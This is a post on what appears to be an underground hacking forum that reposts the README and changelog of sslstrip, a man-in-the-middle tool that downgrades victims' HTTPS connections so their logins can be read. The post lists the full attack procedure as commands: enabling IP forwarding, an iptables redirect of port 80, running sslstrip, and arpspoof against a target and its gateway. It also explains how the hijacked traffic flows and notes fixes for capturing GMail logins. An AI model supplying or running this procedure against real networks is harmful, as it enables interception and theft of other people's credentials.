HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Phyton SSLstrip

Status
Not open for further replies.
dEEpEst

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
32
Reaction score
45,552
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.


 README


sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
attacks.

It requires Python 2.5 or newer, along with the 'twisted' python module.

Installing:
* Unpack: tar zxvf sslstrip-0.5.tar.gz
* Install twisted: sudo apt-get install python-twisted-web
* (Optionally) run 'python setup.py install' as root to install,
or you can just run it out of the directory.

Running:
sslstrip can be run from the source base without installation.
Just run 'python sslstrip.py -h' as a non-root user to get the
command-line options.

The four steps to getting this working (assuming you're running Linux)
are:

1) Flip your machine into forwarding mode (as root):
echo "1" > /proc/sys/net/ipv4/ip_forward

2) Setup iptables to intercept HTTP requests (as root):
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <yourListenPort>

3) Run sslstrip with the command-line options you'd like (see above).

4) Run arpspoof to redirect traffic to your machine (as root):
arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>






Requirements


  • Python >= 2.5 (apt-get install python)
  • The python "twisted-web" module (apt-get install python-twisted-web)


Setup


  • Code: 
    tar zxvf sslstrip-0.9.tar.gz
  • Code: 
    cd sslstrip-0.9
  • (optional)
    Code: 
    sudo python ./setup.py install


Running sslstrip


  • Flip your machine into forwarding mode.
    Code: 
    echo "1" > /proc/sys/net/ipv4/ip_forward
  • Setup iptables to redirect HTTP traffic to sslstrip.
    Code: 
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
  • Run sslstrip.
    Code: 
    sslstrip.py -l <listenPort>
  • Run arpspoof to convince a network they should send their traffic to you.
    Code: 
    arpspoof -i <interface> -t <targetIP> <gatewayIP>


That should do it.


How does this work?


First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.


Development


The current development branch can be found 
This link is hidden for visitors. Please Log in or register now.
.


Changes in 0.9 (05/15/11)


  • Bug fixes introduced in 0.8 that were preventing GMail and other logins.
  • Speed enhancements.
  • Support for stripping compressed content-encodings if they slip past us.


Changes in 0.8 (04/24/11)


  • Major speed enhancements.
  • Compatibility changes for recent versions of twisted.
  • Support for stripping URLs with explicit port specifications (ie: foo.com:443)
  • A number of small bug fixes.


Changes in 0.7 (12/18/09)


  • Fixed a minor bug that could prevent favicon spoofing from working correctly (thanks Simon Nicolussi).


Changes in 0.6 (9/22/09)


  • Fixed a silly bug in specifing the listen port with -l


Changes in 0.5 (9/11/09)


  • Switched to a fully asynchronous model, which should result in tremendous performance improvements.
  • Filter response headers.
  • Started embedding favicon links in the head section of server responses, to increase the chance that a browser will make a request for a secure favicon.


Changes in 0.4 (7/24/09)


  • Fixed a bug that would result in truncated pages.
  • Fixed a bug in relative link matching (thanks Naumaan Mohammed Nayyar)
  • Included some optimzations that should speed things up again.


Changes in 0.3 (7/15/09)


  • Fixed the regular expression compilation to work with Python 2.6.2 (thanks Simon Vans-Colina)
  • Included some optimizations that should speed things up a little.


Changes in 0.2 (02/25/09)


  • Fixed the listen port command-line option to actually work.


Changes in 0.1 (02/21/09)


  • Initial stripped-down public release.



Download:

 
Status
Not open for further replies.
Back
Top